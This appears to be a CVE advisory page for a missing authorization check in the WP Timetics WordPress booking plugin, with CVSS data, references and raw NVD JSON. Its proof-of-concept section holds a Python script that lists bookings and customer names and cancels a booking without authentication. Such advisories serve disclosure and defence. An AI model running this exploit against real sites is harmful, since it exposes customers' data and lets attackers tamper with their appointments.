CVE-2025-5919

Description

The Appointment Booking and Scheduling Calendar Plugin – WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Timetics插件所有版本 <= 1.0.36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target WordPress site with vulnerable Timetics plugin
target = "http://target-wordpress-site.com"

# 1. Unauthenticated enumeration of bookings
print("[*] Enumerating bookings without authentication...")
response = requests.get(f"{target}/wp-json/timetics/v1/bookings")
if response.status_code == 200:
    bookings = response.json()
    print(f"[+] Found {len(bookings)} bookings:")
    for booking in bookings:
        print(f"    - Booking ID: {booking.get('id')}, Customer: {booking.get('customer_name')}")

# 2. Update booking details without authentication
print("\n[*] Attempting to modify booking...")
malicious_data = {
    "id": 1,
    "status": "cancelled",
    "notes": "Modified by unauthorized attacker"
}
update_response = requests.post(
    f"{target}/wp-json/timetics/v1/bookings/update",
    json=malicious_data
)
if update_response.status_code in [200, 201]:
    print("[+] Booking successfully modified without authentication!")
else:
    print(f"[-] Update failed with status: {update_response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-5919
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-5919
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-5919/
[4] VulDB https://vuldb.com/cve/CVE-2025-5919
[5] https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56
[6] https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-5919", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:54.670", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking and Scheduling Calendar Plugin – WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve", "source": "[email protected]"}]}}